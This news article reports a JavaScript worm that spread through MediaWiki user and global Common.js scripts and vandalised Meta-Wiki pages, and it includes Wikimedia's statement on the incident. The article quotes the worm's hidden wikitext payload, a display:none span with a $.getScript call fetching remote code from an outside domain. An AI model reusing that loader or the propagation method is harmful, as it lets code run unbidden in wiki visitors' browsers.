Update: Added Wikimedia Foundation’s statement below and made a correction to denote it was only the Meta-Wiki that was vandalized.
The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began modifying user scripts and vandalizing Meta-Wiki pages.
Editors first reported the incident on Wikipedia’s Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages.
Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes.
The JavaScript worm
According to Wikimedia’s Phabricator issue tracker, it appears the incident started after a malicious script hosted on Russian Wikipedia was executed, causing a global JavaScript script on Wikipedia to be modified with malicious code.
The malicious script was stored at User:Ololoshka562/test.js [Archive], first uploaded in March 2024 and allegedly associated with scripts used in previous attacks on wiki projects.
Based on edit histories reviewed by BleepingComputer, the script is believed to have been executed for the first time by a Wikimedia employee account earlier today while testing user-script functionality. It is not currently known whether the script was executed intentionally, accidentally loaded during testing, or triggered by a compromised account.
BleepingComputer’s review of the archived test.js script shows it self-propagates by injecting malicious JavaScript loaders into both a logged-in user’s common.js and Wikipedia’s global MediaWiki:Common.js, which is used by everyone.
MediaWiki allows both global and user-specific JavaScript files, such as MediaWiki:Common.js and User:<username>/common.js, which are executed in editors’ browsers to customize the wiki interface.
After the initial test.js script was loaded in a logged-in editor’s browser, it attempted to modify two scripts using that editor’s session and privileges:
User-level persistence: it tried to overwrite User:<username>/common.js with a loader that would automatically load the test.js script whenever that user browses the wiki while logged in.
Site-wide persistence: If the user had the right privileges, it would also edit the global MediaWiki:Common.js script, so that it would run for every editor that uses the global script.
Source: BleepingComputer
If the global script was successfully modified, anyone loading it would automatically execute the loader, which would then repeat the same steps, including infecting their own common.js, as shown below.
Source: BleepingComputer
The script also includes functionality to edit a random page by requesting one via the Special:Random wiki command, then editing the page to insert an image and the following hidden JavaScript loader.
[[File:Woodpecker10.jpg|5000px]]
<span style=”display:none”>
[[#%3Cscript%3E$.getScript(‘//basemetrika.ru/s/e41’)%3C/script%3E]]
</span>
According to BleepingComputer’s analysis, approximately 3,996 pages were modified, and around 85 users had their common.js files replaced during the security incident. It is unknown how many pages were deleted.
Source: BleepingComputer
As the worm spread, engineers temporarily restricted editing across projects while reverting the malicious changes and removing references to the injected scripts.
During the cleanup, Wikimedia Foundation staff members also rolled back the common.js for numerous users across the platform. These modified pages have now been “supressed” and are no longer visible in the change histories.
At the time of writing, the injected code has been removed, and editing is once again possible.
However, Wikimedia has not yet published a detailed post-incident report explaining exactly how the dormant script was executed or how widely the worm propagated before it was contained.
Update 3/5/26 7:45 PM ET: The Wikimedia Foundation shared the following statement with BleepingComputer, stating that the code was active for only 23 minutes, during which it only changed and deleted content on Meta-Wiki, which has since been restored.
“Earlier today, Wikimedia Foundation staff were conducting a security review of user-authored code on Wikipedia. During that review, we activated dormant code that was then quickly identified to be malicious. As a preventative measure, we temporarily disabled editing on Wikipedia and other Wikimedia projects while we removed the malicious code and confirmed the website was safe for user activity. The security issue behind this disruption has now been resolved.
The code was active for a 23 minute period. During that time, it changed and deleted content on Meta-Wiki – which is now being restored – but it did not cause permanent damage. We have no evidence that Wikipedia was under attack, or that personal information was breached as part of this incident. We are developing additional security measures to minimize the risk of this kind of incident happening again. Updates continue to be made available via the Foundation’s public incident log.”
Malware is getting smarter. The Red Report 2026 reveals how new threats use math to detect sandboxes and hide in plain sight.
Download our analysis of 1.1 million malicious samples to uncover the top 10 techniques and see if your security stack is blinded.
